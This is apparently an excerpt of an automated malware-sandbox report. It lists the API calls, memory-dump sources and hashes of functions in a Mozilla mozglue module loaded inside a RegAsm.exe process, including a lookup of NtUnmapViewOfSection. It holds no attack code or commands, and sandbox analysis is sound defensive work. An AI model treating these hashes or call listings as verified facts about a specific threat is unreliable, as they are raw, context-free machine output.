                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll,?,6C727592), ref: 6C727608
                                                                                    • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6C727627
                                                                                    • FreeLibrary.KERNEL32(?,6C727592), ref: 6C72763C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                    • String ID: NtUnmapViewOfSection$ntdll.dll
                                                                                    • API String ID: 145871493-1050664331
                                                                                    • Opcode ID: 3ee23e3c0b34e0896d2204f93ecd4bee069f1ce3480d761dbf1f2e7b078fb9d6
                                                                                    • Instruction ID: d4f1aa488d2cd5756058588523eb802d01f6fc86ef242d9214875c23dce85b42
                                                                                    • Opcode Fuzzy Hash: 3ee23e3c0b34e0896d2204f93ecd4bee069f1ce3480d761dbf1f2e7b078fb9d6
                                                                                    • Instruction Fuzzy Hash: 9CE092B4605711ABDF027FB6CE08B057EBDE75A25DF81C13BE905D1601E7B894048B14
                                                                                    Function 6C72C1F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(wintrust.dll,?,6C72C1DE,?,00000000,?,00000000,?,6C6D779F), ref: 6C72C1F8
                                                                                    • GetProcAddress.KERNEL32(00000000,WinVerifyTrust), ref: 6C72C217
                                                                                    • FreeLibrary.KERNEL32(?,6C72C1DE,?,00000000,?,00000000,?,6C6D779F), ref: 6C72C22C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                    • String ID: WinVerifyTrust$wintrust.dll
                                                                                    • API String ID: 145871493-2991032369
                                                                                    • Opcode ID: 171d9b78d670a92479045663f7e751b1ebee853ad3f03802fc8bd32436e7cbf0
                                                                                    • Instruction ID: a8de6fd8c5fe4c1ae3aeed98b07781a813b13bed1c83378c82823d8e65df329b
                                                                                    • Opcode Fuzzy Hash: 171d9b78d670a92479045663f7e751b1ebee853ad3f03802fc8bd32436e7cbf0
                                                                                    • Instruction Fuzzy Hash: 00E0B6B4205B519BEF007F67DA08B067EFCAB5624DF10D537AA24C6602EBB4D4008B50
                                                                                    Function 6C72BE50 Relevance: 7.7, APIs: 5, Instructions: 163memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memset.VCRUNTIME140(?,00000000,?,?,6C72BE49), ref: 6C72BEC4
                                                                                    • RtlCaptureStackBackTrace.NTDLL ref: 6C72BEDE
                                                                                    • memset.VCRUNTIME140(00000000,00000000,-00000008,?,6C72BE49), ref: 6C72BF38
                                                                                    • RtlReAllocateHeap.NTDLL ref: 6C72BF83
                                                                                    • RtlFreeHeap.NTDLL(6C72BE49,00000000), ref: 6C72BFA6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
                                                                                    • String ID:
                                                                                    • API String ID: 2764315370-0
                                                                                    • Opcode ID: e894cb6da58e4892256e8c220586ca0a1af26c43a72774e0f8555cdaa01d2110
                                                                                    • Instruction ID: 037de797d28d3a4f511b4ba9e6b720ffd629a09a0c85f518df9dcc2a1c44a748
                                                                                    • Opcode Fuzzy Hash: e894cb6da58e4892256e8c220586ca0a1af26c43a72774e0f8555cdaa01d2110
                                                                                    • Instruction Fuzzy Hash: EF519471A002158FE724CF69CE80B9AB3B6FF88314F298639D556A7B55D734F9068F80
                                                                                    Function 6C718E00 Relevance: 7.6, APIs: 6, Instructions: 147COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6C70B58D,?,?,?,?,?,?,?,6C73D734,?,?,?,6C73D734), ref: 6C718E6E
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C70B58D,?,?,?,?,?,?,?,6C73D734,?,?,?,6C73D734), ref: 6C718EBF
                                                                                    • free.MOZGLUE(?,?,?,?,6C70B58D,?,?,?,?,?,?,?,6C73D734,?,?,?), ref: 6C718F24
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C70B58D,?,?,?,?,?,?,?,6C73D734,?,?,?,6C73D734), ref: 6C718F46
                                                                                    • free.MOZGLUE(?,?,?,?,6C70B58D,?,?,?,?,?,?,?,6C73D734,?,?,?), ref: 6C718F7A
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C70B58D,?,?,?,?,?,?,?,6C73D734,?,?,?), ref: 6C718F8F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: freemalloc
                                                                                    • String ID:
                                                                                    • API String ID: 3061335427-0
                                                                                    • Opcode ID: 9a6496c3065ad0fd3a192e54e31171163b1d436eb449e2c7cb5105d0f64cb984
                                                                                    • Instruction ID: dca7ded5a8f830af50f56711dfc4a8d0b908c522dd4bc018cd79ffcecb47bdb6
                                                                                    • Opcode Fuzzy Hash: 9a6496c3065ad0fd3a192e54e31171163b1d436eb449e2c7cb5105d0f64cb984
                                                                                    • Instruction Fuzzy Hash: 1D51D6B1A092168FEB10CF54D98076E73B6FF49708F2A053AD916ABB41E731F905CB91
                                                                                    Function 6C6D60E0 Relevance: 7.6, APIs: 6, Instructions: 141COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6C6D5FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C6D60F4
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,6C6D5FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C6D6180
                                                                                    • free.MOZGLUE(?,?,?,?,6C6D5FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C6D6211
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6C6D5FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C6D6229
                                                                                    • free.MOZGLUE(?,?,?,?,6C6D5FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C6D625E
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C6D5FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C6D6271
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: freemalloc
                                                                                    • String ID:
                                                                                    • API String ID: 3061335427-0
                                                                                    • Opcode ID: 819464198d302f5ecd0bdaf31b124646cafaa92f3a37d5e8188f6e1ba7905114
                                                                                    • Instruction ID: 211bfb4830b9507f967a8bb555ced15117fcd750fd435ed54bb66aabccde486f
                                                                                    • Opcode Fuzzy Hash: 819464198d302f5ecd0bdaf31b124646cafaa92f3a37d5e8188f6e1ba7905114
                                                                                    • Instruction Fuzzy Hash: AC518CB1A042068FEB14CF68D8807AEB7B5EF59308F164839C516D7711E731F958CB69
                                                                                    Function 6C7127E0 Relevance: 7.6, APIs: 6, Instructions: 136COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C712620,?,?,?,6C7060AA,6C705FCB,6C7079A3), ref: 6C71284D
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C712620,?,?,?,6C7060AA,6C705FCB,6C7079A3), ref: 6C71289A
                                                                                    • free.MOZGLUE(?,?,?,6C712620,?,?,?,6C7060AA,6C705FCB,6C7079A3), ref: 6C7128F1
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C712620,?,?,?,6C7060AA,6C705FCB,6C7079A3), ref: 6C712910
                                                                                    • free.MOZGLUE(00000001,?,?,6C712620,?,?,?,6C7060AA,6C705FCB,6C7079A3), ref: 6C71293C
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00200000,?,?,6C712620,?,?,?,6C7060AA,6C705FCB,6C7079A3), ref: 6C71294E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: freemalloc
                                                                                    • String ID:
                                                                                    • API String ID: 3061335427-0
                                                                                    • Opcode ID: 5c39f3d08181d3325266c1ae6dd8d3de9cade9cd5f556fff5669783bada5b7b6
                                                                                    • Instruction ID: bd0159aa8e785d83a5013cdffae3aa83a6376bd3f9712fa3f978992dc328cdd2
                                                                                    • Opcode Fuzzy Hash: 5c39f3d08181d3325266c1ae6dd8d3de9cade9cd5f556fff5669783bada5b7b6
                                                                                    • Instruction Fuzzy Hash: E741E2B1A082068FEB10CF6CD98476A77F6EF46308F290939D556EBB41E731E904CB65
                                                                                    Function 6C6CCFE0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 134memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(6C74E784), ref: 6C6CCFF6
                                                                                    • LeaveCriticalSection.KERNEL32(6C74E784), ref: 6C6CD026
                                                                                    • VirtualAlloc.KERNEL32(00000000,00100000,00001000,00000004), ref: 6C6CD06C
                                                                                    • VirtualFree.KERNEL32(00000000,00100000,00004000), ref: 6C6CD139
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSectionVirtual$AllocEnterFreeLeave
                                                                                    • String ID: MOZ_CRASH()
                                                                                    • API String ID: 1090480015-2608361144
                                                                                    • Opcode ID: 3156ba18525c18af6ddba5fa8059982665277936aa117a0b45a447428dc31835
                                                                                    • Instruction ID: 521d0a20a438fb7bcfd5fd5b0492d577c64f0e084dbcccd4277299ef3042786d
                                                                                    • Opcode Fuzzy Hash: 3156ba18525c18af6ddba5fa8059982665277936aa117a0b45a447428dc31835
                                                                                    • Instruction Fuzzy Hash: 82411571B8071A4FDB05DE7C8C903AAB6B0EB4A738F15413AE918E7784D7B19C018BC9
                                                                                    Function 6C6C4DE0 Relevance: 7.6, APIs: 5, Instructions: 133stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C6C4E5A
                                                                                    • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C6C4E97
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6C4EE9
                                                                                    • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C6C4F02
                                                                                    • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C6C4F1E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
                                                                                    • String ID:
                                                                                    • API String ID: 713647276-0
                                                                                    • Opcode ID: 1b2f5f167d0fb814465d5fa4c0143b95d30370a4016f89d2661fd1b3342bf830
                                                                                    • Instruction ID: a6b3407c13ee5a5d388b928ddbfcd7cdf3b2e51efa95c27b5e94c9339d7ff13e
                                                                                    • Opcode Fuzzy Hash: 1b2f5f167d0fb814465d5fa4c0143b95d30370a4016f89d2661fd1b3342bf830
                                                                                    • Instruction Fuzzy Hash: EC41D0716047059FC701CF29C8809BBBBE4FF8A354F108A2DF56587641DBB0E915CB96
                                                                                    Function 6C6DC150 Relevance: 7.6, APIs: 5, Instructions: 110stringtimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C6DC1BC
                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6DC1DC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Now@Stamp@mozilla@@TimeV12@_strlen
                                                                                    • String ID:
                                                                                    • API String ID: 1885715127-0
                                                                                    • Opcode ID: 9b6ac43b5164da892059342922a2de022a91d07f86337cf48ed7877dc7a395ac
                                                                                    • Instruction ID: 95322dc6d44c95a805fe94077c07056d219898cb6146da9ba8c4a059b1b8a070
                                                                                    • Opcode Fuzzy Hash: 9b6ac43b5164da892059342922a2de022a91d07f86337cf48ed7877dc7a395ac
                                                                                    • Instruction Fuzzy Hash: 3E41D1B1D083549FD710DF64C58079ABBE4BF8A308F01856EE89A9B712E730E548CBD6
                                                                                    Function 6C72A820 Relevance: 7.6, APIs: 5, Instructions: 106stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(6C74F770), ref: 6C72A858
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C72A87B
                                                                                      • Part of subcall function 6C72A9D0: memcpy.VCRUNTIME140(?,?,00000400,?,?,?,6C72A88F,00000000), ref: 6C72A9F1
                                                                                    • _ltoa_s.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,00000020,0000000A), ref: 6C72A8FF
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C72A90C
                                                                                    • LeaveCriticalSection.KERNEL32(6C74F770), ref: 6C72A97E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSectionstrlen$EnterLeave_ltoa_smemcpy
                                                                                    • String ID:
                                                                                    • API String ID: 1355178011-0
                                                                                    • Opcode ID: b72d47f9aefe739b84847edc084d0b7941ebfc098e92c8e721343c8fb9f4d0c8
                                                                                    • Instruction ID: 8fe7cdd9f34cb7f86cffb1368ada7b19ce2d62277eeec374d7d145f060a0dbe7
                                                                                    • Opcode Fuzzy Hash: b72d47f9aefe739b84847edc084d0b7941ebfc098e92c8e721343c8fb9f4d0c8
                                                                                    • Instruction Fuzzy Hash: 9641A3B0E002448FDB00DFA4D949BDEBB75FF08324F108629E866AB791D735E945CB91
                                                                                    Function 6C6D1530 Relevance: 7.6, APIs: 5, Instructions: 98COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • moz_xmalloc.MOZGLUE(-00000002,?,6C6D152B,?,?,?,?,6C6D1248,?), ref: 6C6D159C
                                                                                    • memcpy.VCRUNTIME140(00000023,?,?,?,?,6C6D152B,?,?,?,?,6C6D1248,?), ref: 6C6D15BC
                                                                                    • moz_xmalloc.MOZGLUE(-00000001,?,6C6D152B,?,?,?,?,6C6D1248,?), ref: 6C6D15E7
                                                                                    • free.MOZGLUE(?,?,?,?,?,?,6C6D152B,?,?,?,?,6C6D1248,?), ref: 6C6D1606
                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C6D152B,?,?,?,?,6C6D1248,?), ref: 6C6D1637
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
                                                                                    • String ID:
                                                                                    • API String ID: 733145618-0
                                                                                    • Opcode ID: 90e5af0cf063933471e988c8792691fbb01d7132c23acc497ee4486ab673db35
                                                                                    • Instruction ID: c90f9182462851984be336155882aa08f729e66c0f98644727a1cf2fab4a2456
                                                                                    • Opcode Fuzzy Hash: 90e5af0cf063933471e988c8792691fbb01d7132c23acc497ee4486ab673db35
                                                                                    • Instruction Fuzzy Hash: A0312CB1A001148BC7148E7CD8504AE73E5FB8137472A0B6DE423DBBD4EB70F9058799
                                                                                    Function 6C72AD70 Relevance: 7.6, APIs: 5, Instructions: 93COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6C73E330,?,6C6EC059), ref: 6C72AD9D
                                                                                      • Part of subcall function 6C6DCA10: malloc.MOZGLUE(?), ref: 6C6DCA26
                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6C73E330,?,6C6EC059), ref: 6C72ADAC
                                                                                    • free.MOZGLUE(?,?,?,?,00000000,?,?,6C73E330,?,6C6EC059), ref: 6C72AE01
                                                                                    • GetLastError.KERNEL32(?,00000000,?,?,6C73E330,?,6C6EC059), ref: 6C72AE1D
                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6C73E330,?,6C6EC059), ref: 6C72AE3D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$freemallocmemsetmoz_xmalloc
                                                                                    • String ID:
                                                                                    • API String ID: 3161513745-0
                                                                                    • Opcode ID: 91f4f78470e395b6bada8ef0f13cfdc14f4f0979d95b0deea24a9e5629c1ca4a
                                                                                    • Instruction ID: b78ad46456a1a8bf7e75b1cdda01a0937ee35ce1da5791289df47ef9d8439f6f
                                                                                    • Opcode Fuzzy Hash: 91f4f78470e395b6bada8ef0f13cfdc14f4f0979d95b0deea24a9e5629c1ca4a
                                                                                    • Instruction Fuzzy Hash: 0D3193B1D002259FD710DF758D49AABB7F8EF49624F158829E85AD7700E734A805C7A4
                                                                                    Function 6C725EF0 Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6C73DCA0,?,?,?,6C6FE8B5,00000000), ref: 6C725F1F
                                                                                    • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C6FE8B5,00000000), ref: 6C725F4B
                                                                                    • ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6C6FE8B5,00000000), ref: 6C725F7B
                                                                                    • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6C6FE8B5,00000000), ref: 6C725F9F
                                                                                    • ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C6FE8B5,00000000), ref: 6C725FD6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
                                                                                    • String ID:
                                                                                    • API String ID: 1389714915-0
                                                                                    • Opcode ID: e15ad421720d37bf3c7317b7f15a16bf2c04eca1c3818e26275f5f5f0c3ef33c
                                                                                    • Instruction ID: 81ef91acd0e6ae2e82936dda83ace1ef569251b54dc51da3525791605a952d77
                                                                                    • Opcode Fuzzy Hash: e15ad421720d37bf3c7317b7f15a16bf2c04eca1c3818e26275f5f5f0c3ef33c
                                                                                    • Instruction Fuzzy Hash: 74313034300A008FD760DF29D998E2AB7F9FF89319BA48569F55687B99C735EC41CB80
                                                                                    Function 6C6CB4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 6C6CB532
                                                                                    • moz_xmalloc.MOZGLUE(?), ref: 6C6CB55B
                                                                                    • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C6CB56B
                                                                                    • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C6CB57E
                                                                                    • free.MOZGLUE(00000000), ref: 6C6CB58F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
